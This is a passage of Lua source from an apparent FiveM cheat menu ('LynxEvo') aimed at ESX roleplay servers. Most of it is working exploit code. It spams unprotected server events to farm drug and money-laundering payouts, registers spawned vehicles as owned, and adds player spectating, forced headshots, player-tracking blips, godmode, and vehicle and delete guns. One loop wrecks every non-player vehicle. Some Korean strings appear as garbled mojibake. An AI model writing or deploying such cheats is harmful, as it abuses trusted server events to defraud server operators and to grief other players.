  5820. LynxEvo.UnloadModels = function()
  5821. for ct = 1, #LynxEvo.CachedModels do
  5822. local bB = LynxEvo.CachedModels[ct]
  5823. if IsModelValid(bB) then
  5824. SetModelAsNoLongerNeeded(bB)
  5825. else
  5826. RemoveAnimDict(bB)
  5827. end
  5828. end
  5829. end
  5830. local function cu()
  5831. local ax = GetPlayerPed(-1)
  5832. local ay = GetVehiclePedIsIn(ax, true)
  5833. local m = KeyboardInput('Enter the plate license you want', '', 100)
  5834. if m ~= '' then
  5835. SetVehicleNumberPlateText(ay, m)
  5836. end
  5837. end
  5839. function hweed()
  5840. TriggerServerEvent('esx_drugs:startHarvestWeed')
  5841. TriggerServerEvent('esx_drugs:startHarvestWeed')
  5842. TriggerServerEvent('esx_drugs:startHarvestWeed')
  5843. TriggerServerEvent('esx_drugs:startHarvestWeed')
  5844. TriggerServerEvent('esx_drugs:startHarvestWeed')
  5845. end
  5847. function tweed()
  5848. TriggerServerEvent('esx_drugs:startTransformWeed')
  5849. TriggerServerEvent('esx_drugs:startTransformWeed')
  5850. TriggerServerEvent('esx_drugs:startTransformWeed')
  5851. TriggerServerEvent('esx_drugs:startTransformWeed')
  5852. TriggerServerEvent('esx_drugs:startTransformWeed')
  5853. end
  5855. function sweed()
  5856. TriggerServerEvent('esx_drugs:startSellWeed')
  5857. TriggerServerEvent('esx_drugs:startSellWeed')
  5858. TriggerServerEvent('esx_drugs:startSellWeed')
  5859. TriggerServerEvent('esx_drugs:startSellWeed')
  5860. TriggerServerEvent('esx_drugs:startSellWeed')
  5861. end
  5863. function hcoke()
  5864. TriggerServerEvent('esx_drugs:startHarvestCoke')
  5865. TriggerServerEvent('esx_drugs:startHarvestCoke')
  5866. TriggerServerEvent('esx_drugs:startHarvestCoke')
  5867. TriggerServerEvent('esx_drugs:startHarvestCoke')
  5868. TriggerServerEvent('esx_drugs:startHarvestCoke')
  5869. end
  5871. function tcoke()
  5872. TriggerServerEvent('esx_drugs:startTransformCoke')
  5873. TriggerServerEvent('esx_drugs:startTransformCoke')
  5874. TriggerServerEvent('esx_drugs:startTransformCoke')
  5875. TriggerServerEvent('esx_drugs:startTransformCoke')
  5876. TriggerServerEvent('esx_drugs:startTransformCoke')
  5877. end
  5879. function scoke()
  5880. TriggerServerEvent('esx_drugs:startSellCoke')
  5881. TriggerServerEvent('esx_drugs:startSellCoke')
  5882. TriggerServerEvent('esx_drugs:startSellCoke')
  5883. TriggerServerEvent('esx_drugs:startSellCoke')
  5884. TriggerServerEvent('esx_drugs:startSellCoke')
  5885. end
  5887. function hmeth()
  5888. TriggerServerEvent('esx_drugs:startHarvestMeth')
  5889. TriggerServerEvent('esx_drugs:startHarvestMeth')
  5890. TriggerServerEvent('esx_drugs:startHarvestMeth')
  5891. TriggerServerEvent('esx_drugs:startHarvestMeth')
  5892. TriggerServerEvent('esx_drugs:startHarvestMeth')
  5893. end
  5895. function tmeth()
  5896. TriggerServerEvent('esx_drugs:startTransformMeth')
  5897. TriggerServerEvent('esx_drugs:startTransformMeth')
  5898. TriggerServerEvent('esx_drugs:startTransformMeth')
  5899. TriggerServerEvent('esx_drugs:startTransformMeth')
  5900. TriggerServerEvent('esx_drugs:startTransformMeth')
  5901. end
  5903. function smeth()
  5904. TriggerServerEvent('esx_drugs:startSellMeth')
  5905. TriggerServerEvent('esx_drugs:startSellMeth')
  5906. TriggerServerEvent('esx_drugs:startSellMeth')
  5907. TriggerServerEvent('esx_drugs:startSellMeth')
  5908. TriggerServerEvent('esx_drugs:startSellMeth')
  5909. end
  5911. function hopi()
  5912. TriggerServerEvent('esx_drugs:startHarvestOpium')
  5913. TriggerServerEvent('esx_drugs:startHarvestOpium')
  5914. TriggerServerEvent('esx_drugs:startHarvestOpium')
  5915. TriggerServerEvent('esx_drugs:startHarvestOpium')
  5916. TriggerServerEvent('esx_drugs:startHarvestOpium')
  5917. end
  5919. function topi()
  5920. TriggerServerEvent('esx_drugs:startTransformOpium')
  5921. TriggerServerEvent('esx_drugs:startTransformOpium')
  5922. TriggerServerEvent('esx_drugs:startTransformOpium')
  5923. TriggerServerEvent('esx_drugs:startTransformOpium')
  5924. TriggerServerEvent('esx_drugs:startTransformOpium')
  5925. end
  5927. function sopi()
  5928. TriggerServerEvent('esx_drugs:startSellOpium')
  5929. TriggerServerEvent('esx_drugs:startSellOpium')
  5930. TriggerServerEvent('esx_drugs:startSellOpium')
  5931. TriggerServerEvent('esx_drugs:startSellOpium')
  5932. TriggerServerEvent('esx_drugs:startSellOpium')
  5933. end
  5935. function mataaspalarufe()
  5936. TriggerServerEvent('esx_blanchisseur:startWhitening', 85)
  5937. TriggerServerEvent('esx_blanchisseur:startWhitening', 85)
  5938. TriggerServerEvent('esx_blanchisseur:startWhitening', 85)
  5939. TriggerServerEvent('esx_blanchisseur:startWhitening', 85)
  5940. TriggerServerEvent('esx_blanchisseur:startWhitening', 85)
  5941. TriggerServerEvent('esx_blanchisseur:startWhitening', 85)
  5942. TriggerServerEvent('esx_blanchisseur:startWhitening', 85)
  5943. TriggerServerEvent('esx_blanchisseur:startWhitening', 85)
  5944. TriggerServerEvent('esx_blanchisseur:startWhitening', 85)
  5945. TriggerServerEvent('esx_blanchisseur:startWhitening', 85)
  5946. end
  5948. function matanumaispalarufe()
  5949. TriggerServerEvent('esx_drugs:stopHarvestCoke')
  5950. TriggerServerEvent('esx_drugs:stopTransformCoke')
  5951. TriggerServerEvent('esx_drugs:stopSellCoke')
  5952. TriggerServerEvent('esx_drugs:stopHarvestMeth')
  5953. TriggerServerEvent('esx_drugs:stopTransformMeth')
  5954. TriggerServerEvent('esx_drugs:stopSellMeth')
  5955. TriggerServerEvent('esx_drugs:stopHarvestWeed')
  5956. TriggerServerEvent('esx_drugs:stopTransformWeed')
  5957. TriggerServerEvent('esx_drugs:stopSellWeed')
  5958. TriggerServerEvent('esx_drugs:stopHarvestOpium')
  5959. TriggerServerEvent('esx_drugs:stopTransformOpium')
  5960. TriggerServerEvent('esx_drugs:stopSellOpium')
  5961. av('~b~Everything is now stopped.', false)
  5962. end
  5963. local function cv()
  5964. local cb = KeyboardInput('?뚰솚??李⑤웾 ?대쫫 ?곸뼱留?媛€??ex)jet, rhino', '', 100)
  5965. local cw = KeyboardInput('?ъ슜??李⑤웾 踰덊샇??, '', 100)
  5966. if cb and IsModelValid(cb) and IsModelAVehicle(cb) then
  5967. RequestModel(cb)
  5968. while not HasModelLoaded(cb) do
  5969. Citizen.Wait(0)
  5970. end
  5971. local veh =
  5972. CreateVehicle(
  5973. GetHashKey(cb),
  5974. GetEntityCoords(PlayerPedId(-1)),
  5975. GetEntityHeading(PlayerPedId(-1)),
  5976. true,
  5977. true
  5978. )
  5979. SetVehicleNumberPlateText(veh, cw)
  5980. local cx = ESX.Game.GetVehicleProperties(veh)
  5981. TriggerServerEvent('esx_vehicleshop:setVehicleOwned', cx)
  5982. av('~g~~h~Success', false)
  5983. else
  5984. av('~b~~h~?대떦 李⑤웾???놁뒿?덈떎! ?대쫫???뺤씤?댁<?몄슂.', true)
  5985. end
  5986. end
  5988. function daojosdinpatpemata()
  5989. local ax = GetPlayerPed(-1)
  5990. local ay = GetVehiclePedIsIn(ax, true)
  5991. if
  5992. IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
  5993. GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
  5994. then
  5995. SetVehicleOnGroundProperly(ay)
  5996. av('~g~Vehicle Flipped!', false)
  5997. else
  5998. av("~b~You Aren't In The Driverseat Of A Vehicle!", true)
  5999. end
  6000. end
  6002. function stringsplit(cy, cz)
  6003. if cz == nil then
  6004. cz = '%s'
  6005. end
  6006. local cA = {}
  6007. i = 1
  6008. for cB in string.gmatch(cy, '([^' .. cz .. ']+)') do
  6009. cA[i] = cB
  6010. i = i + 1
  6011. end
  6012. return cA
  6013. end
  6014. local cC = false
  6016. function SpectatePlayer(cD)
  6017. local ax = PlayerPedId(-1)
  6018. cC = not cC
  6019. local cE = GetPlayerPed(cD)
  6020. if cC then
  6021. local cF, cG, cH = table.unpack(GetEntityCoords(cE, false))
  6022. RequestCollisionAtCoord(cF, cG, cH)
  6023. NetworkSetInSpectatorMode(true, cE)
  6024. av('媛먯떆以?. ' .. GetPlayerName(cD), false)
  6025. else
  6026. local cF, cG, cH = table.unpack(GetEntityCoords(cE, false))
  6027. RequestCollisionAtCoord(cF, cG, cH)
  6028. NetworkSetInSpectatorMode(false, cE)
  6029. av('媛먯떆醫낅즺.. ' .. GetPlayerName(cD), false)
  6030. end
  6031. end
  6033. function ShootPlayer(cD)
  6034. local head = GetPedBoneCoords(cD, GetEntityBoneIndexByName(cD, 'SKEL_HEAD'), 0.0, 0.0, 0.0)
  6035. SetPedShootsAtCoord(PlayerPedId(-1), head.x, head.y, head.z, true)
  6036. end
  6038. function MaxOut(veh)
  6039. SetVehicleModKit(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0)
  6040. SetVehicleWheelType(GetVehiclePedIsIn(GetPlayerPed(-1), false), 7)
  6041. SetVehicleMod(
  6042. GetVehiclePedIsIn(GetPlayerPed(-1), false),
  6043. 0,
  6044. GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0) - 1,
  6045. false
  6046. )
  6047. SetVehicleMod(
  6048. GetVehiclePedIsIn(GetPlayerPed(-1), false),
  6049. 1,
  6050. GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 1) - 1,
  6051. false
  6052. )
  6053. SetVehicleMod(
  6054. GetVehiclePedIsIn(GetPlayerPed(-1), false),
  6055. 2,
  6056. GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 2) - 1,
  6057. false
  6058. )
  6059. SetVehicleMod(
  6060. GetVehiclePedIsIn(GetPlayerPed(-1), false),
  6061. 3,
  6062. GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 3) - 1,
  6063. false
  6064. )
  6065. SetVehicleMod(
  6066. GetVehiclePedIsIn(GetPlayerPed(-1), false),
  6067. 4,
  6068. GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 4) - 1,
  6069. false
  6070. )
  6071. SetVehicleMod(
  6072. GetVehiclePedIsIn(GetPlayerPed(-1), false),
  6073. 5,
  6074. GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 5) - 1,
  6075. false
  6076. )
  6077. SetVehicleMod(
  6078. GetVehiclePedIsIn(GetPlayerPed(-1), false),
  6079. 6,
  6080. GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 6) - 1,
  6081. false
  6082. )
  6083. SetVehicleMod(
  6084. GetVehiclePedIsIn(GetPlayerPed(-1), false),
  6085. 7,
  6086. GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 7) - 1,
  6087. false
  6088. )
  6089. SetVehicleMod(
  6090. GetVehiclePedIsIn(GetPlayerPed(-1), false),
  6091. 8,
  6092. GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 8) - 1,
  6093. false
  6094. )
  6095. SetVehicleMod(
  6096. GetVehiclePedIsIn(GetPlayerPed(-1), false),
  6097. 9,
  6098. GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 9) - 1,
  6099. false
  6100. )
  6101. SetVehicleMod(
  6102. GetVehiclePedIsIn(GetPlayerPed(-1), false),
  6103. 10,
  6104. GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 10) - 1,
  6105. false
  6106. )
  6107. SetVehicleMod(
  6108. GetVehiclePedIsIn(GetPlayerPed(-1), false),
  6109. 11,
  6110. GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 11) - 1,
  6111. false
  6112. )
  6113. SetVehicleMod(
  6114. GetVehiclePedIsIn(GetPlayerPed(-1), false),
  6115. 12,
  6116. GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 12) - 1,
  6117. false
  6118. )
  6119. SetVehicleMod(
  6120. GetVehiclePedIsIn(GetPlayerPed(-1), false),
  6121. 13,
  6122. GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 13) - 1,
  6123. false
  6124. )
  6125. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 14, 16, false)
  6126. SetVehicleMod(
  6127. GetVehiclePedIsIn(GetPlayerPed(-1), false),
  6128. 15,
  6129. GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 15) - 2,
  6130. false
  6131. )
  6132. SetVehicleMod(
  6133. GetVehiclePedIsIn(GetPlayerPed(-1), false),
  6134. 16,
  6135. GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 16) - 1,
  6136. false
  6137. )
  6138. ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 17, true)
  6139. ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 18, true)
  6140. ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 19, true)
  6141. ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 20, true)
  6142. ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 21, true)
  6143. ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 22, true)
  6144. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 23, 1, false)
  6145. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 24, 1, false)
  6146. SetVehicleMod(
  6147. GetVehiclePedIsIn(GetPlayerPed(-1), false),
  6148. 25,
  6149. GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 25) - 1,
  6150. false
  6151. )
  6152. SetVehicleMod(
  6153. GetVehiclePedIsIn(GetPlayerPed(-1), false),
  6154. 27,
  6155. GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 27) - 1,
  6156. false
  6157. )
  6158. SetVehicleMod(
  6159. GetVehiclePedIsIn(GetPlayerPed(-1), false),
  6160. 28,
  6161. GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 28) - 1,
  6162. false
  6163. )
  6164. SetVehicleMod(
  6165. GetVehiclePedIsIn(GetPlayerPed(-1), false),
  6166. 30,
  6167. GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 30) - 1,
  6168. false
  6169. )
  6170. SetVehicleMod(
  6171. GetVehiclePedIsIn(GetPlayerPed(-1), false),
  6172. 33,
  6173. GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 33) - 1,
  6174. false
  6175. )
  6176. SetVehicleMod(
  6177. GetVehiclePedIsIn(GetPlayerPed(-1), false),
  6178. 34,
  6179. GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 34) - 1,
  6180. false
  6181. )
  6182. SetVehicleMod(
  6183. GetVehiclePedIsIn(GetPlayerPed(-1), false),
  6184. 35,
  6185. GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 35) - 1,
  6186. false
  6187. )
  6188. SetVehicleMod(
  6189. GetVehiclePedIsIn(GetPlayerPed(-1), false),
  6190. 38,
  6191. GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 38) - 1,
  6192. true
  6193. )
  6194. SetVehicleWindowTint(GetVehiclePedIsIn(GetPlayerPed(-1), false), 1)
  6195. SetVehicleTyresCanBurst(GetVehiclePedIsIn(GetPlayerPed(-1), false), false)
  6196. SetVehicleNumberPlateTextIndex(GetVehiclePedIsIn(GetPlayerPed(-1), false), 5)
  6197. SetVehicleNeonLightEnabled(GetVehiclePedIsIn(GetPlayerPed(-1)), 0, true)
  6198. SetVehicleNeonLightEnabled(GetVehiclePedIsIn(GetPlayerPed(-1)), 1, true)
  6199. SetVehicleNeonLightEnabled(GetVehiclePedIsIn(GetPlayerPed(-1)), 2, true)
  6200. SetVehicleNeonLightEnabled(GetVehiclePedIsIn(GetPlayerPed(-1)), 3, true)
  6201. SetVehicleNeonLightsColour(GetVehiclePedIsIn(GetPlayerPed(-1)), 222, 222, 255)
  6202. end
  6204. function DelVeh(veh)
  6205. SetEntityAsMissionEntity(Object, 1, 1)
  6206. DeleteEntity(Object)
  6207. SetEntityAsMissionEntity(GetVehiclePedIsIn(GetPlayerPed(-1), false), 1, 1)
  6208. DeleteEntity(GetVehiclePedIsIn(GetPlayerPed(-1), false))
  6209. end
  6211. function Clean(veh)
  6212. SetVehicleDirtLevel(veh, 15.0)
  6213. end
  6215. function Clean2(veh)
  6216. SetVehicleDirtLevel(veh, 1.0)
  6217. end
  6219. function RequestControl(entity)
  6220. local cI = 0
  6221. NetworkRequestControlOfEntity(entity)
  6222. while not NetworkHasControlOfEntity(entity) do
  6223. cI = cI + 100
  6224. Citizen.Wait(100)
  6225. if cI > 5000 then
  6226. av('Hung for 5 seconds, killing to prevent issues...', true)
  6227. end
  6228. end
  6229. end
  6231. function getEntity(cD)
  6232. local m, entity = GetEntityPlayerIsFreeAimingAt(cD, Citizen.ReturnResultAnyway())
  6233. return entity
  6234. end
  6236. function GetInputMode()
  6237. return Citizen.InvokeNative(0xA571D46727E2B718, 2) and 'MouseAndKeyboard' or 'GamePad'
  6238. end
  6240. function DrawSpecialText(cJ, cK)
  6241. SetTextEntry_2('STRING')
  6242. AddTextComponentString(cJ)
  6243. DrawSubtitleTimed(cK, 1)
  6244. end
  6245. local cL = true
  6246. local cM = false
  6247. local cN = true
  6248. local cO = true
  6249. Citizen.CreateThread(
  6250. function()
  6251. while true do
  6252. Wait(1)
  6253. for f = 0, 128 do
  6254. if NetworkIsPlayerActive(f) and GetPlayerPed(f) ~= GetPlayerPed(-1) then
  6255. ped = GetPlayerPed(f)
  6256. blip = GetBlipFromEntity(ped)
  6257. x1, y1, z1 = table.unpack(GetEntityCoords(GetPlayerPed(-1), true))
  6258. x2, y2, z2 = table.unpack(GetEntityCoords(GetPlayerPed(f), true))
  6259. distance = math.floor(GetDistanceBetweenCoords(x1, y1, z1, x2, y2, z2, true))
  6260. headId = Citizen.InvokeNative(0xBFEFE3321A3F5015, ped, GetPlayerName(f), false, false, '', false)
  6261. wantedLvl = GetPlayerWantedLevel(f)
  6262. if cM then
  6263. Citizen.InvokeNative(0x63BB75ABEDC1F6A0, headId, 0, true)
  6264. if wantedLvl then
  6265. Citizen.InvokeNative(0x63BB75ABEDC1F6A0, headId, 7, true)
  6266. Citizen.InvokeNative(0xCF228E2AA03099C3, headId, wantedLvl)
  6267. else
  6268. Citizen.InvokeNative(0x63BB75ABEDC1F6A0, headId, 7, false)
  6269. end
  6270. else
  6271. Citizen.InvokeNative(0x63BB75ABEDC1F6A0, headId, 7, false)
  6272. Citizen.InvokeNative(0x63BB75ABEDC1F6A0, headId, 9, false)
  6273. Citizen.InvokeNative(0x63BB75ABEDC1F6A0, headId, 0, false)
  6274. end
  6275. if cL then
  6276. if not DoesBlipExist(blip) then
  6277. blip = AddBlipForEntity(ped)
  6278. SetBlipSprite(blip, 1)
  6279. Citizen.InvokeNative(0x5FBCA48327B914DF, blip, true)
  6280. SetBlipNameToPlayerName(blip, f)
  6281. else
  6282. veh = GetVehiclePedIsIn(ped, false)
  6283. blipSprite = GetBlipSprite(blip)
  6284. if not GetEntityHealth(ped) then
  6285. if blipSprite ~= 274 then
  6286. SetBlipSprite(blip, 274)
  6287. Citizen.InvokeNative(0x5FBCA48327B914DF, blip, false)
  6288. SetBlipNameToPlayerName(blip, f)
  6289. end
  6290. elseif veh then
  6291. vehClass = GetVehicleClass(veh)
  6292. vehModel = GetEntityModel(veh)
  6293. if vehClass == 15 then
  6294. if blipSprite ~= 422 then
  6295. SetBlipSprite(blip, 422)
  6296. Citizen.InvokeNative(0x5FBCA48327B914DF, blip, false)
  6297. SetBlipNameToPlayerName(blip, f)
  6298. end
  6299. elseif vehClass == 16 then
  6300. if
  6301. vehModel == GetHashKey('besra') or vehModel == GetHashKey('hydra') or
  6302. vehModel == GetHashKey('lazer')
  6303. then
  6304. if blipSprite ~= 424 then
  6305. SetBlipSprite(blip, 424)
  6306. Citizen.InvokeNative(0x5FBCA48327B914DF, blip, false)
  6307. SetBlipNameToPlayerName(blip, f)
  6308. end
  6309. elseif blipSprite ~= 423 then
  6310. SetBlipSprite(blip, 423)
  6311. Citizen.InvokeNative(0x5FBCA48327B914DF, blip, false)
  6312. end
  6313. elseif vehClass == 14 then
  6314. if blipSprite ~= 427 then
  6315. SetBlipSprite(blip, 427)
  6316. Citizen.InvokeNative(0x5FBCA48327B914DF, blip, false)
  6317. end
  6318. elseif
  6319. vehModel == GetHashKey('insurgent') or vehModel == GetHashKey('insurgent2') or
  6320. vehModel == GetHashKey('limo2')
  6321. then
  6322. if blipSprite ~= 426 then
  6323. SetBlipSprite(blip, 426)
  6324. Citizen.InvokeNative(0x5FBCA48327B914DF, blip, false)
  6325. SetBlipNameToPlayerName(blip, f)
  6326. end
  6327. elseif vehModel == GetHashKey('rhino') then
  6328. if blipSprite ~= 421 then
  6329. SetBlipSprite(blip, 421)
  6330. Citizen.InvokeNative(0x5FBCA48327B914DF, blip, false)
  6331. SetBlipNameToPlayerName(blip, f)
  6332. end
  6333. elseif blipSprite ~= 1 then
  6334. SetBlipSprite(blip, 1)
  6335. Citizen.InvokeNative(0x5FBCA48327B914DF, blip, true)
  6336. SetBlipNameToPlayerName(blip, f)
  6337. end
  6338. passengers = GetVehicleNumberOfPassengers(veh)
  6339. if passengers then
  6340. if not IsVehicleSeatFree(veh, -1) then
  6341. passengers = passengers + 1
  6342. end
  6343. ShowNumberOnBlip(blip, passengers)
  6344. else
  6345. HideNumberOnBlip(blip)
  6346. end
  6347. else
  6348. HideNumberOnBlip(blip)
  6349. if blipSprite ~= 1 then
  6350. SetBlipSprite(blip, 1)
  6351. Citizen.InvokeNative(0x5FBCA48327B914DF, blip, true)
  6352. SetBlipNameToPlayerName(blip, f)
  6353. end
  6354. end
  6355. SetBlipRotation(blip, math.ceil(GetEntityHeading(veh)))
  6356. SetBlipNameToPlayerName(blip, f)
  6357. SetBlipScale(blip, 0.85)
  6358. if IsPauseMenuActive() then
  6359. SetBlipAlpha(blip, 255)
  6360. else
  6361. x1, y1 = table.unpack(GetEntityCoords(GetPlayerPed(-1), true))
  6362. x2, y2 = table.unpack(GetEntityCoords(GetPlayerPed(f), true))
  6363. distance =
  6364. math.floor(math.abs(math.sqrt((x1 - x2) * (x1 - x2) + (y1 - y2) * (y1 - y2))) / -1) +
  6365. 900
  6366. if distance < 0 then
  6367. distance = 0
  6368. elseif distance > 255 then
  6369. distance = 255
  6370. end
  6371. SetBlipAlpha(blip, distance)
  6372. end
  6373. end
  6374. else
  6375. RemoveBlip(blip)
  6376. end
  6377. end
  6378. end
  6379. end
  6380. end
  6381. )
  6382. local cP = {
  6383. __gc = function(cQ)
  6384. if cQ.destructor and cQ.handle then
  6385. cQ.destructor(cQ.handle)
  6386. end
  6387. cQ.destructor = nil
  6388. cQ.handle = nil
  6389. end
  6390. }
  6392. function EnumerateEntities(cR, cS, cT)
  6393. return coroutine.wrap(
  6394. function()
  6395. local cU, f = cR()
  6396. if not f or f == 0 then
  6397. cT(cU)
  6398. return
  6399. end
  6400. local cQ = {
  6401. handle = cU,
  6402. destructor = cT
  6403. }
  6404. setmetatable(cQ, cP)
  6405. local cV = true
  6406. repeat
  6407. coroutine.yield(f)
  6408. cV, f = cS(cU)
  6409. until not cV
  6410. cQ.destructor, cQ.handle = nil, nil
  6411. cT(cU)
  6412. end
  6413. )
  6414. end
  6416. function EnumeratePeds()
  6417. return EnumerateEntities(FindFirstPed, FindNextPed, EndFindPed)
  6418. end
  6420. function EnumerateVehicles()
  6421. return EnumerateEntities(FindFirstVehicle, FindNextVehicle, EndFindVehicle)
  6422. end
  6424. function EnumerateObjects()
  6425. return EnumerateEntities(FindFirstObject, FindNextObject, EndFindObject)
  6426. end
  6428. function RotationToDirection(cW)
  6429. local cX = cW.z * 0.0174532924
  6430. local cY = cW.x * 0.0174532924
  6431. local cZ = math.abs(math.cos(cY))
  6432. return vector3(-math.sin(cX) * cZ, math.cos(cX) * cZ, math.sin(cY))
  6433. end
  6435. function OscillateEntity(entity, c_, d0, d1, d2)
  6436. if entity ~= 0 and entity ~= nil then
  6437. local d3 = (d0 - c_) * d1 * d1 - 2.0 * d1 * d2 * GetEntityVelocity(entity)
  6438. ApplyForceToEntity(entity, 3, d3.x, d3.y, d3.z + 0.1, 0.0, 0.0, 0.0, false, false, true, true, false, true)
  6439. end
  6440. end
  6441. local d4 = true
  6442. Citizen.CreateThread(
  6443. function()
  6444. while bw do
  6445. Citizen.Wait(0)
  6446. SetPlayerInvincible(PlayerId(), Godmode)
  6447. SetEntityInvincible(PlayerPedId(-1), Godmode)
  6448. SetEntityVisible(GetPlayerPed(-1), d4, 0)
  6449. if SuperJump then
  6450. SetSuperJumpThisFrame(PlayerId(-1))
  6451. end
  6452. if InfStamina then
  6453. RestorePlayerStamina(PlayerId(-1), 1.0)
  6454. end
  6455. if fastrun then
  6456. SetRunSprintMultiplierForPlayer(PlayerId(-1), 2.49)
  6457. SetPedMoveRateOverride(GetPlayerPed(-1), 2.15)
  6458. else
  6459. SetRunSprintMultiplierForPlayer(PlayerId(-1), 1.0)
  6460. SetPedMoveRateOverride(GetPlayerPed(-1), 1.0)
  6461. end
  6462. if VehicleGun then
  6463. local d5 = 'Freight'
  6464. local c0 = GetEntityCoords(GetPlayerPed(-1), true)
  6465. if IsPedInAnyVehicle(GetPlayerPed(-1), true) == false then
  6466. av('~g~Vehicle Gun Enabled!~n~~w~Use The ~b~AP Pistol~n~~b~Aim ~w~and ~b~Shoot!', false)
  6467. GiveWeaponToPed(GetPlayerPed(-1), GetHashKey('WEAPON_APPISTOL'), 999999, false, true)
  6468. SetPedAmmo(GetPlayerPed(-1), GetHashKey('WEAPON_APPISTOL'), 999999)
  6469. if GetSelectedPedWeapon(GetPlayerPed(-1)) == GetHashKey('WEAPON_APPISTOL') then
  6470. if IsPedShooting(GetPlayerPed(-1)) then
  6471. while not HasModelLoaded(GetHashKey(d5)) do
  6472. Citizen.Wait(0)
  6473. RequestModel(GetHashKey(d5))
  6474. end
  6475. local veh =
  6476. CreateVehicle(
  6477. GetHashKey(d5),
  6478. c0.x + 5 * GetEntityForwardX(GetPlayerPed(-1)),
  6479. c0.y + 5 * GetEntityForwardY(GetPlayerPed(-1)),
  6480. c0.z + 2.0,
  6481. GetEntityHeading(GetPlayerPed(-1)),
  6482. true,
  6483. true
  6484. )
  6485. SetEntityAsNoLongerNeeded(veh)
  6486. SetVehicleForwardSpeed(veh, 150.0)
  6487. end
  6488. end
  6489. end
  6490. end
  6491. if DeleteGun then
  6492. local d6 = getEntity(PlayerId(-1))
  6493. if IsPedInAnyVehicle(GetPlayerPed(-1), true) == false then
  6494. av('~g~Delete Gun Enabled!~n~~w~Use The ~b~Pistol~n~~b~Aim ~w~and ~b~Shoot ~w~To Delete!')
  6495. GiveWeaponToPed(GetPlayerPed(-1), GetHashKey('WEAPON_PISTOL'), 999999, false, true)
  6496. SetPedAmmo(GetPlayerPed(-1), GetHashKey('WEAPON_PISTOL'), 999999)
  6497. if GetSelectedPedWeapon(GetPlayerPed(-1)) == GetHashKey('WEAPON_PISTOL') then
  6498. if IsPlayerFreeAiming(PlayerId(-1)) then
  6499. if IsEntityAPed(d6) then
  6500. if IsPedInAnyVehicle(d6, true) then
  6501. if IsControlJustReleased(1, 142) then
  6502. SetEntityAsMissionEntity(GetVehiclePedIsIn(d6, true), 1, 1)
  6503. DeleteEntity(GetVehiclePedIsIn(d6, true))
  6504. SetEntityAsMissionEntity(d6, 1, 1)
  6505. DeleteEntity(d6)
  6506. av('~g~Deleted!')
  6507. end
  6508. else
  6509. if IsControlJustReleased(1, 142) then
  6510. SetEntityAsMissionEntity(d6, 1, 1)
  6511. DeleteEntity(d6)
  6512. av('~g~Deleted!')
  6513. end
  6514. end
  6515. else
  6516. if IsControlJustReleased(1, 142) then
  6517. SetEntityAsMissionEntity(d6, 1, 1)
  6518. DeleteEntity(d6)
  6519. av('~g~Deleted!')
  6520. end
  6521. end
  6522. end
  6523. end
  6524. end
  6525. end
  6526. if fuckallcars then
  6527. for ay in EnumerateVehicles() do
  6528. if not IsPedAPlayer(GetPedInVehicleSeat(ay, -1)) then
  6529. SetVehicleHasBeenOwnedByPlayer(ay, false)
  6530. SetEntityAsMissionEntity(ay, false, false)
  6531. StartVehicleAlarm(ay)
  6532. DetachVehicleWindscreen(ay)
  6533. SmashVehicleWindow(ay, 0)
  6534. SmashVehicleWindow(ay, 1)
  6535. SmashVehicleWindow(ay, 2)
  6536. SmashVehicleWindow(ay, 3)
  6537. SetVehicleTyreBurst(ay, 0, true, 1000.0)
  6538. SetVehicleTyreBurst(ay, 1, true, 1000.0)
  6539. SetVehicleTyreBurst(ay, 2, true, 1000.0)
  6540. SetVehicleTyreBurst(ay, 3, true, 1000.0)
  6541. SetVehicleTyreBurst(ay, 4, true, 1000.0)
  6542. SetVehicleTyreBurst(ay, 5, true, 1000.0)
  6543. SetVehicleTyreBurst(ay, 4, true, 1000.0)
  6544. SetVehicleTyreBurst(ay, 7, true, 1000.0)
  6545. SetVehicleDoorBroken(ay, 0, true)
  6546. SetVehicleDoorBroken(ay, 1, true)
  6547. SetVehicleDoorBroken(ay, 2, true)
  6548. SetVehicleDoorBroken(ay, 3, true)
  6549. SetVehicleDoorBroken(ay, 4, true)
  6550. SetVehicleDoorBroken(ay, 5, true)
